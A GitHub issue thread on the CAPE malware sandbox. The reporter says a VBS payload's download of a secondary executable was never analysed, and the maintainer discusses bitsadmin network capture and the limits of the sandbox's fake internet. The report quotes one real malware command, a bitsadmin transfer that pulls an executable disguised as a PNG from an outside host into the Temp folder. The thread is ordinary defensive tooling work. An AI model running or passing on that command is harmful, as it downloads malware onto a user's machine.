### ISSUE TITLE
Does not capture and process new exe from vbs payload described in link

### ISSUE THREAD

**Issue by redsand** [ctxis/CAPE#60]
The following command  is ran, however there is no secondary inspection of the new binary:

 "bitsadmin /transfer ms5 http://postservises.org/layout.png C:\Users\user\AppData\Local\Temp/erierfri.exe"

See for reference: https://cape.contextis.com/analysis/12812/

**Comment by kevoreilly** [comment]
Am on the case - thanks.

**Comment by kevoreilly** [comment]
No network activity is captured from bitsadmin, but I wonder if that might be because it offloads the download to a service. It's not clear from the log though.
Presumably nothing else happens as the download fails - the current fake internet setup on the community instance is woeful but this is hopefully going to change. I am hoping for internet access for the vms soon.
